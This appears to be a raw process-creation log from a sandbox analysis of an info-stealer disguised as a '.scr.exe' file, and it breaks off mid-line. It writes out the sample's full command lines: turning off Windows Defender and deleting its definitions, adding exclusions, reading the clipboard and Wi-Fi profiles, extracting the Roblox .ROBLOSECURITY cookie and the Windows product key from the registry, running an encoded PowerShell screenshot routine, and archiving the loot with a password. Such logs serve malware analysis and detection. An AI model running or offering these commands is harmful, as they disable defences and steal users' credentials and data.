Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6756.tmp" "c:\Users\user\AppData\Local\Temp\xuxqeuoy\CSC1B8650382DAF4CDABC63EC72E90C84.TMP"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe "C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 